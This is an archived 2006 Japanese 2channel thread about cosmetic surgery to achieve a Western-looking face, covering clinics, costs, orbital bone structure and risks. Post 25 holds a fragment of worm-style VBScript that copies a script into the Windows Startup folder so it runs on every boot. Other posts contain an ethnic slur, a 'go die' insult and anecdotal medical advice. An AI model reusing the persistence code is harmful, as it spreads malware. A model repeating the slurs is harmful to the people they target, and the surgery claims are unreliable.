2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

外人顔にしたいんですけど

1 :名無しさん@Before→After:2006/08/23(水) 11:29:40 ID:/inf/+pX
外人顔にしたいと思ってるんですけど
どこのクリニックがいいんですか??

2 :名無しさん@Before→After:2006/08/23(水) 11:32:45 ID:4JA7Z/PX
外人顔、不自然顔は大塚美容形成外科へ

3 :名無しさん@Before→After:2006/08/23(水) 12:02:33 ID:+lzF1zLX
>>1
断然ヴェリテクリニックがおすすめhttp://www.veriteclinic.com/topics/eye.html
ここまで極めたことに感動をおぼえたよ

4 :名無しさん@Before→After:2006/08/23(水) 12:32:56 ID:/inf/+pX
ヴェリテって評判悪いらしいけど外人顔になれるから迷ってるんですよね

5 :名無しさん@Before→After:2006/08/23(水) 14:14:24 ID:/inf/+pX
あげ

6 :名無しさん@Before→After:2006/08/23(水) 14:22:47 ID:jB5dclv7
クソスレ立てるな

7 :名無しさん@Before→After:2006/08/23(水) 14:45:01 ID:bHODCa91
>>1
国内だとヴェリテぐらいしかやってないんじゃない?

リスクだってあるから自分でカウセ行ってよく考えな

…確かに糞スレ

8 :名無しさん@Before→After:2006/08/23(水) 15:15:06 ID:g2AtGA/h
品川美容整形わ今キャンペーン中だしやったら自然にいい感じの二重になったお勧め☆

9 :名無しさん@Before→After:2006/08/23(水) 16:04:14 ID:/inf/+pX
国外はZ??

10 :名無しさん@Before→After:2006/08/27(日) 12:12:03 ID:tp37Ifrm
あげ

11 :名無しさん@Before→After:2006/09/08(金) 13:22:06 ID:Ns2Z5cC7


12 :名無しさん@Before→After:2006/09/11(月) 21:24:55 ID:R4wcv4e1
http://jpsex-movies.com/protect/image4/228maria/07.jpg

こんなんがええのん?

13 :名無しさん@Before→After:2006/09/11(月) 23:15:53 ID:JDzi3xie
>>3 この医院で手術するといくらくらいかかりますかね?

14 :名無しさん@Before→After:2006/09/12(火) 18:18:20 ID:J6jN2tJ6
AGE

15 :名無しさん@Before→After:2006/09/12(火) 18:39:21 ID:XyQoTaIl
>>13
とりあえず額、鼻(肋骨)、目、顎で300〜400万ぐらいじゃない?

16 :名無しさん@Before→After:2006/09/12(火) 19:28:35 ID:J6jN2tJ6
>>15 マジメに外国人顔になりたいので、カウンセリング行ってきます。
1年100万くらいずつ貯めて、大学卒業する頃にはやりたいなぁ〜。

17 :名無しさん@Before→After:2006/09/12(火) 20:00:10 ID:xZtu910o
日本人の骨格では無理だお^^目の上の骨けずらなきゃ

18 :名無しさん@Before→After:2006/09/21(木) 20:58:37 ID:HwJS5m7k
あげ

19 :??:2006/09/22(金) 17:56:17 ID:8Hh1ie4v
止めときな?成功率低い上に成功しても十年たったら崩れるだけだし。
ぶっちゃけ結婚でもして幸せになったらそんなコンプレックスなんてどうでもよくなるから。


20 :剣汰:2006/09/24(日) 17:45:19 ID:7Avm8x0x
俺ゎ外人顔だけどイイ事何ってありませんよ(ノω・、) ウゥ・・・外人顔だから毎日指刺されます↓↓
外人でも俺はお前らと同じ人間です!って感じです!日本人になりたぁ〜い!ヾ(=^▽^=)ノ

21 :名無しさん@Before→After:2006/10/01(日) 22:19:49 ID:x1iGuASJ
あげ

22 :名無しさん@Before→After:2006/10/01(日) 22:24:49 ID:LdkXVlyL
外人顔って白人顔ってこと?
モンゴロイドの日本人が整形しても、
ニューハーフ顔か東南アジア人顔か中近東人顔にしかならないよ。

23 :名無しさん@Before→After:2006/10/02(月) 23:13:13 ID:4inM1DFA
白人に決まってんじゃん

24 :名無しさん@Before→After:2006/10/02(月) 23:17:05 ID:+gbmzWUY
いや、ここはあえてチョンでw

25 :名無しさん@Before→After:2006/10/12(木) 21:49:15 ID:zI1iKIjp
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"

26 :名無しさん@Before→After:2006/10/16(月) 14:02:09 ID:3HmgTR0E
目頭を摘むと二重になって
ハーフ外人顔になるが、手が邪魔して顔がよく見えないorz

27 :名無しさん@Before→After:2006/10/20(金) 19:41:38 ID:FjJ+Geqc
>>26 なんか笑えた

28 :名無しさん@Before→After:2006/10/31(火) 16:00:58 ID:3cCHskLC
挙げ

29 :名無しさん@Before→After:2006/10/31(火) 23:59:36 ID:xOCOlHUA
中近東顔でいいからなりたい。だって中東の人美形多いし。本当の西洋人
にはなれないのは分かってる。とりあえず彫り深くしたいよ。

30 :名無しさん@Before→After:2006/11/01(水) 01:37:04 ID:wiq38HXu
後で後悔しても戻せんよ。

31 :名無しさん@Before→After:2006/11/01(水) 03:02:48 ID:A4QmCZ6K
外人顔の質問いろいろしてみたけど美容外科医が言うには一番コーカソイド
との骨格の違いは眼窩骨だって。眼窩の骨が高く盛り上がってるから目が窪んで
奥目になってシャドーが出来る。日本人はここの骨が扁平で盛り上がってないから
奥目にならず出目。だから外人顔になるにはここの骨を出さなきゃいけないらしい
けど恐いね。元に戻せないし。でも額だけ出しても彫りは深くならないみたい。

32 :名無しさん@Before→After:2006/11/02(木) 05:48:54 ID:VvNLg0y7
すいません、質問したいのですけど、日本人がこの人のような顔になるには何の整形をすれば近づけますか?
http://arasi.com/celebrity/i/jyoyuu/ae/img/Anne-Hathaway5.jpg

33 :名無しさん@Before→After:2006/11/02(木) 06:05:09 ID:VvNLg0y7
比較してみました
http://www.cinemacafe.net/img/template/200609/060927prada_sub2.jpg

34 :名無しさん@Before→After:2006/11/02(木) 14:31:03 ID:dMRxkpRP
アン・ハサウェイだね

釣りですか?

35 :名無しさん@Before→After:2006/11/02(木) 16:50:32 ID:eH2gQotT
私ハーフっぽいって言われるよ。眉の骨が眉尻まで高い+頬骨がめちゃくちゃ上の位置にある。

目と目の幅が狭くて顎長くてデコ広い。

あとは茶目+色白くらいかな。

鼻は高くないです。

36 :名無しさん@Before→After:2006/11/02(木) 18:38:38 ID:Dv22lRWA
整形に関する板なので、自称ハーフ顔の自慢とかはいらないです^^

37 :名無しさん@Before→After:2006/11/02(木) 19:51:20 ID:VvNLg0y7
>>34
全然釣りとかじゃないです。整形するならこの人のような顔に近づけたいと思うので。

38 :名無しさん@Before→After:2006/11/02(木) 21:37:55 ID:dMRxkpRP
そっかごめんね。

アン・ハサウェイ可愛いよね
でも近づくにしても、元がハーフじゃないと難しそう。整形と化粧で造れるパーツじゃないかも。
あと真っ白な肌が決め手だよね
押切とのツーショット見るとよくわかる
写真持って相談しに行ってみたら?

39 :名無しさん@Before→After:2006/11/02(木) 22:01:40 ID:VvNLg0y7
>>38
ありがとうございます。そうですか、やっぱり難しいですよね。あれぐらい白くなりたいなぁ…。色々相談してみることにします。

40 :名無しさん@Before→After:2006/11/03(金) 06:27:26 ID:wlbn3JIb
私も外人顔になりたいよ。
化粧(特殊メイクというか整形メイク)すると
「ハーフ?」ってたまに言われる。


41 :名無しさん@Before→After:2006/11/03(金) 07:24:04 ID:m85/Pe8t
>>31
掘りが比較的浅くても、鼻の根元が高ければハーフには見えるよね。

42 :名無しさん@Before→After:2006/11/03(金) 08:24:03 ID:G2ZtMnzZ
まじデかい
http://www3.upjo.com/up/data/img20050.jpg

43 :名無しさん@Before→After:2006/11/03(金) 11:25:32 ID:SWI/LQhO
スレチ承知ですが…

女の子の場合、ハーフっぽい顔はモテない気がします。
同性には可愛く見える(自分も含め)だけで…。



44 :名無しさん@Before→After:2006/11/03(金) 12:18:21 ID:+gcwqYQZ
外国人の二重は日本人と違うからね

45 :名無しさん@Before→After:2006/11/03(金) 13:12:27 ID:IzAGvBxm
中途半端だからな。
もてないかもしれんな。
完璧に外人か、日本人らしい美形のほうが好きだな おれは。
何事も中途半端はだめってことですねww

46 :名無しさん@Before→After:2006/11/03(金) 13:13:49 ID:IzAGvBxm
<<43
に対してのレスです

47 :名無しさん@Before→After:2006/11/03(金) 14:09:16 ID:d1wC5cpE
45ごときの好みは誰も聞いてません

モテるモテないあんまり気にしなくていいんじゃない?結局自己満足だし。
男ウケ狙ってる子に限って可愛くなかったりする

48 :山本モナ:2006/11/03(金) 16:00:58 ID:bV0xA11w
>>1
やめれ。
黄色人種には合わんのだよ。

49 :名無しさん@Before→After:2006/11/03(金) 16:27:17 ID:IzAGvBxm
<<47
別にお前にしゃべってないんだから、しゃしゃりでてくんな。カス


50 :名無しさん@Before→After:2006/11/03(金) 16:29:59 ID:IzAGvBxm
日本の美人が好きとわざわざお世辞までいってやってんのによ。
気にくわねー。

51 :名無しさん@Before→After:2006/11/03(金) 16:34:42 ID:T4Srbud9
>>1
君にできることと言ったら、カラコンするか金髪に染めるかだと思うよ

52 :名無しさん@Before→After:2006/11/04(土) 12:05:17 ID:MbsXT3tv
外人顔を目指すことの是否は別として、
そうしたい人同士で情報交換をするのはいいんじゃない?
後悔したって、整形なんて自己責任なんだし

私は外人というよりハーフ顔に憧れてるので、
目頭だけでもやりたい

53 :名無しさん@Before→After:2006/11/05(日) 03:53:57 ID:dHf/tWL9
私はハーフ顔でよくハーフに間違えられますが輪郭やパーツの配置と大きさ
や口元が全く出てないとこは日本人離れしてると思いますが、外国人特有の
目の上の骨が出ている奥目ではないのが一番違うところだと思います。ここを
出せば目の周りにシャドーが出来てかなり外人っぽくなれるみたいですが手術
が恐いですよね・・・特に目の周辺は神経通ってるし。

54 :名無しさん@Before→After:2006/11/05(日) 04:03:15 ID:dHf/tWL9
53ですがこの前おでこにヒアル打ってきました。外人はおでこが出ていて
立体的なので、おでこを出せば奥目になって彫り深くみえるかなと思ったんですが
殆どなりませんでした。ただおでこが立体的になっただけでした。
やはり眼窩骨を出さなきゃいけないみたいです。もし誰かそういう手術をされた
方がいたら情報ください。

55 :名無し:2006/11/06(月) 04:18:22 ID:oRsC0qHT
高校生で外人顔にしたいって事でデコにシリコン入れて鼻プロテして頬骨削って目二重して外人顔にした人聞いた事あるけど登校拒否になってオペした医者がその子の人生狂わせたと叩かれたらしいよ〜外人顔はやめとけ〜メリットないよ

56 ::2006/11/06(月) 04:38:22 ID:oRsC0qHT
昔、結婚してて旦那がブルースウィルスに憧れて整形してたのがテレビであってたけどそれっぽくはなってたよ〜男の場合は少し外人よりの方がいいかもしらんが女は違うと思うよ

57 :名無しさん@Before→After:2006/11/06(月) 05:03:46 ID:iMGdknVp
>>55はヴェリデのモニター少年のことかな?
彼はものすごい大変貌を遂げて、
昔ポパイによく出てたハーフモデルによく似た顔立ちになった。
大成功だと思う。崩れるとか10年後がどうとかいらぬ心配をする向きもあるが
あの手術達に、殊更心配すべき後遺症なんてべつだんないと思う。
>>56はコムロのモニターさんのことだね。
ありきたりな目鼻の手術を少し大げさにやっただけ。

58 :1:2006/11/06(月) 11:21:10 ID:2eGlWugK
>>57
>>55はヴェリテの子のモニターの子ではないと思います。詳しくはいえませんが。


59 :58:2006/11/06(月) 11:32:08 ID:2eGlWugK
1というのは気にしないでください。


60 :.:2006/11/06(月) 16:09:11 ID:fqPD5HXA
もともとが外人顔ならともかくのっぺらっとした人がやったって不自然なだけ。
やめたほうがいいよ。

61 :名無しさん@Before→After:2006/11/06(月) 16:39:18 ID:2eGlWugK
てか、もともと外人顔ならやる必要ねーだろ。

62 :名無しさん@Before→After:2006/11/06(月) 17:48:06 ID:0HD9FWTR
女で眉骨高くておでこが斜めに見えるし二重の幅が広げられないので眉骨削ろうかと思ったんですが…やめた方がいいですかね?

63 :名無しさん@Before→After:2006/11/06(月) 22:38:09 ID:t0F6HZhX
あなたの顔全体を見る事ができないから何とも断言できないですが、迷うくらいなら辞めておいた方が良い。

64 :名無しさん@Before→After:2006/11/06(月) 22:59:58 ID:lY4OXRqM
わたし口の横幅がほんとに小さくて悩んでます。
なんかいい方法ありますか?そのせいで顔がでかくみえます。

65 :名無しさん@Before→After:2006/11/09(木) 10:41:26 ID:co27tAC7
唇を薄くすることはできても横幅を大きくすることは無理らしい。でも頬の
リフトをすれば口が横に引っ張られて大きくなるらしいよ。

66 :名無しさん@Before→After:2006/11/09(木) 10:49:05 ID:co27tAC7
ヴェリテの外人顔の男の子は眼窩上縁を1センチ程出したらしい。そんなに出して
何の問題も起きないのかな??恐い

67 :名無しさん@Before→After:2006/11/09(木) 11:09:06 ID:NLqF23D0
>>66
症例写真でみるより実物はフランケンに近いだろうね

68 :名無しさん@Before→After:2006/11/09(木) 13:26:16 ID:i2mx8MWu
ヴェリテクリニックすごいな。
整形と云うより、「改造人間」と言ったほうがびったりくる(藁
まさしく魔改造。
マイケルジャクソンの整形に通じるものが・・

金がないから今は駄目だが、俺も仲間幸恵になりたいから
ヴェリテクリニック行くかも(藁

ちゅーか施術例の面々も、周りから堂思われてるんだろ?


69 :名無しさん@Before→After:2006/11/09(木) 14:09:54 ID:BE618PYi
わたしも口の横幅のせいでほっぺたがでかくみえる(--;)なんか方法ないですか?

70 :名無しさん@Before→After:2006/11/09(木) 14:41:10 ID:2Ax1M3cv
さっさと死んで来世に期待しな

71 :名無しさん@Before→After:2006/11/09(木) 21:33:11 ID:x6g+NhiR
仲間由紀恵顔になりたい男性なんですか?w

72 :名無しさん@Before→After:2006/11/09(木) 22:28:59 ID:8ztwL3H5
オンナ顔になりたいってことでいいのでしょうか。

73 :68:2006/11/10(金) 07:44:54 ID:zq1p3QTf
アジア風の仲間由紀恵風か、白人タイプでフランス人形風?の
どっちかになりたい(藁

この感覚は、変態かな?
色つきのリップクリーム使ってて、女友達に笑われた事あるけど
ちんこ切り+胸形成とかはやらんけどとにかく綺麗になりたいのよ♪




74 :名無しさん@Before→After:2006/11/10(金) 10:56:57 ID:1eZchKGX
男が女みたいにキレイになって何したいの?自己満?モテたいの?金使うだけでメリットないと思うけど・・

75 :名無しさん@Before→After:2006/11/10(金) 13:16:51 ID:XTm+u7W8
おちんちん切ったり豊胸はしないけど、女顔の美形になりたいんだよね?
極めるまでいかなくても、同じ男性であるオカマさんにいろいろ質問した方が勉強になるよ。
男くささを消す方法とか。
ちょっとスレ違いなので他へお願いします

76 :名無しさん@Before→After:2006/11/16(木) 08:30:50 ID:0ZD2XCAL
鼻をめちゃくちゃ西洋人の鼻にしたいんですが、一般的に何をすれば近づきますか? 鼻尖、鼻翼、プロテだけでなりますか?

77 :名無しさん@Before→After:2006/11/17(金) 23:56:55 ID:P46Rg5eT
あなたの元の形がどうなのかわからない…

イメージしてる事はわかるんだけど、やっぱりアジア人と西洋人は鼻だけでなく骨格全体が異なるじゃない?
額や頬、あご、眉間がアジア人の骨格のままで、せっかく完璧に鼻を造ってもハナデカな日本人にしか見えない。

78 :名無しさん@Before→After:2006/11/18(土) 22:42:02 ID:wGP0/+M8
>>53さん
おでこにヒアル打ったとありますが、眉上まではヒアルははいってないんですか?

79 :名無しさん@Before→After:2006/11/20(月) 23:58:53 ID:EcrnLibt
53です。眉毛のすぐ上には入れましたよ。でも奥目にするには目のすぐ
上の骨を出さないとだめみたいです。基本的に外人はこの骨が前方に出ている
ので目に奥行きがあります。日本人はこの骨は出てないから奥目にならないんです。
だから日本人で目の大きい人は少し目が出ている人が多いですよね。それは目の上の
骨が出てないからなんです。外人は目が大きい上に眼球が存在する位置以上に目の上
の骨が出ているから出目にならず、彫りの深い目になるんです。骨格の一番顕著な違い
は眼窩骨だと美容外科医に言われました。

80 :名無しさん@Before→After:2006/11/28(火) 20:38:59 ID:W2g4p7jN
堀深くなりたい

81 :名無しさん@Before→After:2006/12/05(火) 11:26:39 ID:/JQQgiy9
彫の深い顔は若いうちは綺麗だけど25過ぎたら、めちゃ老けて見えるから、先を考えて、鼻と顎だけでも変えたら、だいぶ違うんじゃない?目は化粧で誤魔化せば?

82 :名無しさん@Before→After:2006/12/05(火) 14:31:13 ID:yDSczVVw
この3人みたいにきれいになりたい。整形では限界があるのかな。この写真を持っていくと恥ずかしいかな。
http://www.zoo-minami.com/cast20.html
http://www.zoo-minami.com/cast2629.html
http://www.zoo-minami.com/cast30.html

83 :名無しさん@Before→After:2006/12/05(火) 14:36:24 ID:P6YUowND
↑ 失礼だけど、この3人のどこがキレイなの?

84 :名無しさん@Before→After:2006/12/06(水) 22:01:55 ID:P2Lv3ZWG
宣伝ご苦労さん

85 :名無しさん@Before→After:2006/12/07(木) 23:08:46 ID:fBPwX77u
芸能人って目鼻立ちくっきりの人多いけど若く見えるよ

86 :名無しさん@Before→After:2006/12/07(木) 23:31:39 ID:XwXfxuIi
>>85
芸能人はプロのメイクにライトがあるから

87 :名無しさん@Before→After:2006/12/18(月) 22:53:42 ID:esbkhSWZ
外国人顔アゲ

88 :名無しさん@Before→After:2006/12/18(月) 23:10:18 ID:avKWUxLy
二重の全切開と脱脂で奥目になったよ。
もとから出目じゃなかったけど、目と眉毛の距離が近づいた。

89 :名無しさん@Before→After:2006/12/18(月) 23:10:45 ID:tgDvmp3j
外人にはなりません
不自然なだけ

90 :名無しさん@Before→After:2006/12/21(木) 21:13:30 ID:ipXUgkTA
男性で外人顔もしくはハーフ顔に激変したって例がないかな?
ヴェ◎テクリ●ックのは見たけれど他にないかな・・・
黒田センセ、平賀センセ、福田センセ位かな・・・
他の大手はアカンね・・・きっと。



91 :名無しさん@Before→After:2006/12/21(木) 21:28:45 ID:LlQCGoQM
>>88
おれも全切開と皮膚切除と脱脂で狭くなったように見える。
もともと彫りは深めで現在5mm

92 :名無しさん@Before→After:2006/12/21(木) 23:13:02 ID:aWvt6RXl
整形したらどうなるか不安な人はココやってみるとイィよ

http://57.xmbsp.jp/ss/

93 :名無しさん@Before→After:2006/12/22(金) 22:44:49 ID:BX4AP7Ql
やっぱり、骨格から改善しないと目と鼻だけじゃ無理・・・
で、一気に大工事となると費用やタイムダウンの長さやその期間の精神面
を考えると整形はやっぱり一大決心だよな・・・
整形成功者は偉いと思う今日この頃・・・


18 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)